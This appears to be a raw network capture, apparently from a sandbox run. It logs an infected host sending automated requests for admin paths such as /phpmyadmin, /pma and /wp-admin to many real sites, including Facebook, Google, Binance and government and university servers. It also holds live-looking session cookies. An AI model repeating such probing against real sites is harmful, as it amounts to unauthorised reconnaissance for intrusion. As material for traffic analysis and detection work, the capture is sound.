                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC611INData Raw: 31 62 39 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 2f 2f 69 2e 62 63 69 63 64 6e 2e 63 6f 6d 2f 63 73 73 2d 6d 69 6e 2f 34 74 73 35 37 2f 65 78 74 72 61 2f 64 65 70 72 65 63 61 74 65 64 5f 73 74 75 62 2e 63 73 73 22 20 64 61 74 61 2d 65 78 74 72 61 3d 22 31 22 20 2f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 6f 22 20 64 61 74 61 2d 63 73 72 66 5f 66 69 65 6c 64 3d 22 5f 63 73 72 66 5f 74 6f 6b 65 6e 22 20 64 61 74 61 2d 63 73 72 66 5f 76 61 6c 75 65 3d 22 36 38 64 32 62 62 63 38 38 35 35 31 33 63 39 38 30 32 31 35 36 62 34 64 39 35 37 63 62 62 39 38 22 3e 0a 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1b9d<link rel="stylesheet" type="text/css" media="screen" href="//i.bcicdn.com/css-min/4ts57/extra/deprecated_stub.css" data-extra="1" /><!DOCTYPE html><html lang="ro" data-csrf_field="_csrf_token" data-csrf_value="68d2bbc885513c9802156b4d957cbb98"><
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6d 64 42 62 65 4e 47 46 6f 76 33 65 56 35 4b 77 33 54 76 45 4f 50 2d 66 43 32 62 41 31 32 4f 61 4e 45 7a 39 2d 63 33 71 7a 51 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 72 65 65 61 7a 61 2d 74 69 20 63 6f 6e 74 75 6c 20 67 72 61 74 75 69 74 20 31 30 30 25 2e 31 30 30 2b 20 6d 6f 64 65 6c 65 20 64 69 73 70 6f 6e 69 62 69 6c 65 20 70 65 6e 74 72 75 20 73 65 78 20 6c 69 76 65 20 70 65 20 63 61 6d 65 72 65 20 77 65 62 2e 20 41 6c 61 74 75 72 61 2d 74 65 20 63 65 6c 65 69 20 6d 61 69 20 6d 61 72 69 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ephone=no" /><meta name="google-site-verification" content="jmdBbeNGFov3eV5Kw3TvEOP-fC2bA12OaNEz9-c3qzQ" /><meta name="description" content="Creeaza-ti contul gratuit 100%.100+ modele disponibile pentru sex live pe camere web. Alatura-te celei mai mari
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 65 65 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 74 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 6c 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 67 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 67 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 76 2e 62 6f 6e 67 61 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ee.bongacams.com/phpmyadmin" hreflang="et" /><link rel="alternate" href="https://lt.bongacams.com/phpmyadmin" hreflang="lt" /><link rel="alternate" href="https://bg.bongacams.com/phpmyadmin" hreflang="bg" /><link rel="alternate" href="https://lv.bongac
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 72 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 72 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 72 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 72 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: alternate" href="https://hr.bongacams.com/phpmyadmin" hreflang="hr" /><link rel="alternate" href="https://fr.bongacams.com/phpmyadmin" hreflang="fr" /><link rel="alternate" href="https://it.bongacams.com/phpmyadmin" hreflang="it" /><link rel="alternate
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 69 2e 62 63 69 63 64 6e 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2f 62 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 3f 32 30 32 33 31 32 32 35 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 6d 61 6e 69 66 65 73 74 2d 62 63 2e 6a 73 6f 6e 3f 32 30 32 33 31 32 32 35 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 61 30 32 32 33 39 22 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: " type="image/svg+xml" sizes="any"> <link rel="apple-touch-icon" href="//i.bcicdn.com/favicon/bc/apple-touch-icon.png?20231225"> <link rel="manifest" href="/manifest-bc.json?20231225"> <meta name="theme-color" content="#a02239"><script async src="h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC990INData Raw: 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6d 67 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 44 6f 77 6e 6c 6f 61 64 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: w noopener"></a> <div class="dbs_l_img"></div> <div class="dbs_l_title"> Mozilla Firefox </div> <div class="dbs_l_info"> Download </div> </div> <div class="dbs_l
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
183         192.168.2.6  65261        44.199.96.179    443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:11 UTC  233                OUT        GET /wp-admin/ HTTP/1.1
                                                       Host: pxndx-mcr.boletia.com
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                       Referer: https://pxndx-mcr.boletia.com/wp-login.php
2024-02-05 11:16:11 UTC  197                IN         HTTP/1.1 404 Not Found
                                                       Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                       Content-Type: text/html
                                                       Content-Length: 7358
                                                       Connection: close
                                                       Server: nginx/1.12.2
                                                       Vary: Accept-Encoding
                                                       ETag: "5df8f9a3-1cbe"
2024-02-05 11:16:11 UTC  7358               IN         Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID  Source IP    Source Port  Destination IP   Destination Port
184         192.168.2.6  65264        162.159.135.232  443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:11 UTC  515                OUT        GET /wp-admin/ HTTP/1.1
                                                       Host: discord.com
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       Cookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                       Referer: https://discord.com/wp-login.php
2024-02-05 11:16:11 UTC  846                IN         HTTP/1.1 302 Found
                                                       Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                       Content-Type: text/plain;charset=UTF-8
                                                       Content-Length: 0
                                                       Connection: close
                                                       Location: https://discord.com/wp-admin
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Permissions-Policy: interest-cohort=()
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                       X-XSS-Protection: 1; mode=block
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qpb5Fv6dmqTXvY70tjwoAFXRQHomYYtPvrtTqzvz3sL9HHs9kZWC7uYotOGf9Nlax037eadL4QImLrL2eVEZtO%2FyCltM%2FId6O5G3P0GhAWMJgQmj3Eb1Hshdh3Yy"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 850abd619d9e06ff-ATL
                                                       alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
185 | 192.168.2.6 | 63532 | 47.251.24.188 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 171 | OUT | GET /pma HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 731 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 39
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                set-cookie: csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: lng=en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: language=en|en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Location: /404
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                                                                                                                                                                                x-readtime: 12
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-02-05 11:16:11 UTC | 39 | IN | Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 34 30 34 22 3e 2f 34 30 34 3c 2f 61 3e 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Redirecting to <a href="/404">/404</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port
186 | 192.168.2.6 | 63696 | 31.13.88.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 389 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=th_TH&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: lE7BP/L3VxrQNdtYKijrKH8rwZM1y7Q2yRcDO6vpZijlGezmmxzj6FleeVy+/imQEgR/9gY+I13M1iNlZ94X1w==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
187 | 192.168.2.6 | 63343 | 186.113.7.204 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 188 | OUT | GET /phpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 911 | IN | HTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1002
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=2282888620.59425.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: dcid=1707131771255-34727872; Expires=Sun, 05-May-2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: pvid=1707131771255-71353977; Expires=Mon, 05-Feb-2024 11:21:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=MCPBPDIPPPCOMKFPHFDJNDKHMLOJBNAGGGJLKOHELAEOACOEOOPLCKEMKDFMAPDGIOODBMJAADPCCAGJCCDAFABCDMHIHAJNKAHEOOIKOMIPOGONKFHNPLJKOOHONLJH; HttpOnly; secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS0130ba83=01fd6418ebd276f27ea6b42b055e6f9f9b1801b05962b2a64d91a3ac46f706d6b943a577e220f651cf4dc68b6d6c8f0ec6c74e0d3a9924d15cfaf368b701688f4e193f6d335577fb997eb0c7b89318bf45d25386fd53b31af9461e8acc91f1e912cefb9ef70a4ec00371355a8c5b700470eb4c2548; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
2024-02-05 11:16:11 UTC | 1002 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


Session ID | Source IP | Source Port | Destination IP | Destination Port
188 | 192.168.2.6 | 63475 | 31.13.65.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 170 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 369 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/pma/?_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 6ycv/nbmM/Sh7rMEMov496O3T8EdMcZQVczCEh9huscT7IJxXuPw1VE2PZAIt0iIOg+73dbHrQkthyi1iQJFGw==
Date: Mon, 05 Feb 2024 11:16:11 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
189 | 192.168.2.6 | 63143 | 201.134.41.61 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 190 | OUT | GET /academico/phpMyAdmin/ HTTP/1.1
Host: academico.um.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 451 | IN | HTTP/1.1 302
Date: Mon, 05 Feb 2024 11:16:11 GMT
Server: Apache/2.4.29 (Ubuntu)
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: SAMEORIGIN
Location: https://academico.um.edu.mx/academico/login
Content-Length: 0
Set-Cookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0; Path=/academico; HttpOnly
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
190 | 192.168.2.6 | 63705 | 177.74.1.157 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sistemas.pa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:11 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-02-05 11:16:11 UTC | 196 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
191 | 192.168.2.6 | 63116 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:11 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ga_EiA8m8LFXDnSewpCsRQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:11 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:11 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
192 | 192.168.2.6 | 65218 | 82.221.28.171 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 170 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: www.uh.is
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 256 | IN | HTTP/1.1 404 /phpMyAdmin/
Server: nginx
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 988
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=681EEB354EE0F006DFB345B00C6E1B7D; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC988INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 35 2e 30 2e 33 30 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Apache Tomcat/5.0.30 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:1


Session ID: 193
Source IP: 192.168.2.6
Source Port: 63120
Destination IP: 172.203.148.34
Destination Port: 443

Timestamp: 2024-02-05 11:16:11 UTC, Bytes transferred: 180, Direction: OUT, Data:
GET /phpMyAdmin/ HTTP/1.1
Host: eei.uniandes.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: 2024-02-05 11:16:11 UTC, Bytes transferred: 162, Direction: IN, Data:
HTTP/1.1 401
WWW-Authenticate: realm user=""
Transfer-Encoding: chunked
Date: Mon, 05 Feb 2024 11:16:10 GMT
Server: WSO2 Carbon Server
Connection: close

Timestamp: 2024-02-05 11:16:11 UTC, Bytes transferred: 5, Direction: IN, Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 194
Source IP: 192.168.2.6
Source Port: 65367
Destination IP: 3.161.136.2
Destination Port: 443

Timestamp: 2024-02-05 11:16:11 UTC, Bytes transferred: 184, Direction: OUT, Data:
GET /en/phpmyadmin/ HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: 2024-02-05 11:16:12 UTC, Bytes transferred: 925, Direction: IN, Data:
HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Mon, 05 Feb 2024 11:16:11 GMT
Server: Tuser
Accept-Ranges: bytes
Cache-Control: no-store, max-age=0, must-revalidate
ETag: "65bd0376-f119"
Last-Modified: Fri, 02 Feb 2024 15:00:06 GMT
Set-Cookie: theme=dark; Path=/; Domain=binance.com
X-Cache-Proxy: hit
X-Cache-Proxy-Key: cpv2_gzip_0b17c7bf69dc55b7d9dd89654cfce6c2
X-Cluster-Info: fe-com
X-Envoy-Decorator-Operation: cache-proxy.cache-proxy.svc.cluster.local:80/*
X-Envoy-Upstream-Service-Time: 0
X-Gateway: traefik
X-Trace-Id: 3efeb29b5d8c4513bec8a8c1b63cd0da
X-Traefik-Duration: 2.00
Cross-Origin-Opener-Policy: same-origin-allow-popups
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 e9ad444fedffae0e4c433f10a5ccab72.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P4
X-Amz-Cf-Id: R-feYvjzr6GF2F3Hw0gWXoQaPflorp6emK6GGeadf3GLNysHNvK5gw==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
195         192.168.2.6  65375        195.85.23.95    443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  452                OUT        GET /admin HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
